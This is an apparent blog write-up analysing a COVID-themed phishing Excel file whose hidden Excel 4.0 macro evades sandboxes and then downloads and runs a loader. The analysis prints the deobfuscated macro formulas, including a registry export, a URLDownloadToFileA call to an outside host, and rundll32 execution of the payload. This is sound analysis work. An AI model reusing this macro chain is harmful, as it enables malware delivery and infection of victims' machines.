This email came across my desk this morning. It has a COVID-19 theme along with this .xls attachment.
First things first, we can see in the first picture below that it does say we’ve got an Excel 4.0 macro sheet, very hidden. This is good information for how to tackle this document. While olevba.py does extract the OLE stream, the output isn’t all that helpful. I don’t blame that on the tool. I believe it is due to the way this macro has been obfuscated. Either way, we can tell that something is going on here.
This blog post from SANS shows how to examine the OLE object using oledump.py. Again, the output isn’t very helpful.
Getting to the macro
How then can we examine the actual macro inside the document? Notice how the output of both olevba.py and oledump.py showed that the Excel 4.0 macrosheet was very hidden.
Google tells you that there are multiple ways to get these sheets visible. I tried a bunch of them and the method described here worked for me. You will need the following code:
Sub ShowAllSheets() Dim sh As Worksheet For Each sh In ActiveWorkbook.Sheets sh.Visible = True Next End Sub
Copy that into the exiting macro sheet like so and click play/Run/(press F5).
After running the macro, you will see the unhidden sheet:
This is where things get interesting. We can see columns A – O full of =CHAR(xx) characters. They all get sewn together in column P and the output is tossed in column Q. I’ve hidden a few of the columns to show what’s going on a bit easier. Please pardon my anemic drawing skills.
In the section below, the formula in P1 takes all of the characters from column A, sews them together, and places them in column Q4. The rest of the commands are put together in a similar manner by continuing down column P and adding more commands to column Q. The last line in column P then says =GOTO(Q4).
Column Q: Macro Analysis and Sandbox Evasion Techniques
Let’s look at the commands in column Q section by section. I found the .pdf here to be very helpful in understanding what is going on.
This first section of the macro shows the first attempt to see if it is being executed in a sandbox. GET.WORKSPACE 19 and 42 check to see if a mouse is present and if the computer is capable of playing sounds, respectively. GET.WORKSPACE(1) checks the environment in which Microsoft Excel is running followed by the environment’s version number.
=IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
If those three are true, then copy the Excel security registry keys to C:\Users\public\1.reg.
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
Next, it waits for three seconds. It then opens 1.reg, starts at byte position 215, and reads the next 255 bytes.
=WAIT(NOW()+"00:00:03") =FOPEN("c:\users\public\1.reg") =FPOS(Q10, 215) =FREAD(Q10, 255)
What is in that section of 1.reg? Below is the highlighted section in a hex editor and Notepad. It contains the registry values for AccessVBOM and especially VBAWarnings.
1.reg gets closed and deleted. It then searches what was read (stored in cell Q12) for the string “0001”. This is the second test to see if it is in a sandbox. If it finds that string, it will close the spreadsheet. If it does not find the string “0001”, it will then attempt to download a file and save it as an .html file in C:\Users\Public\.
=FCLOSE(Q10) =FILE.DELETE("c:\users\public\1.reg") =IF(ISNUMBER(SEARCH("0001",Q12)),CLOSE(FALSE),) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)
What does the string “0001” have to do with anything? Changing the settings for what Excel does with macros changes the registry settings for VBAWarnings. If our macro sees that VBAWarnings are set to 1, this means that “Enable all macros” have been set. And only sandboxes would have macros set to always run… right?
So as a reward for having your company’s group policy set to disable all macros, our malicious document then shows an alert, followed by a call to run the saved .html file (which by the way is actually an .exe).
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5) =CLOSE(FALSE)
I’m not exactly sure what initial loader gets downloaded, but I will update this when I get more info.
UPDATE: Word on the street is zloader gets downloaded.
Until then, thanks for reading!